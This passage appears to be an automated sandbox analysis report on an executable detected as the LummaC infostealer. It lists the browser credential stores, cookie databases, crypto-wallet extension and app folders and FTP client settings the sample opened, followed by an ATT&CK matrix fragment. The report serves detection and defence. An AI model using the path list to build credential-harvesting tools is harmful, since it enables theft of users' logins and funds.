              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\biyhoksefdad.exeDirectory queried: number of queries: 1001
              Source: Yara matchFile source: 00000000.00000003.1541986119.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1541835345.0000000000FC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: biyhoksefdad.exe PID: 8332, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: biyhoksefdad.exe PID: 8332, type: MEMORYSTR
              Source: Yara matchFile source: 0.2.biyhoksefdad.exe.a80000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1708761696.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		2
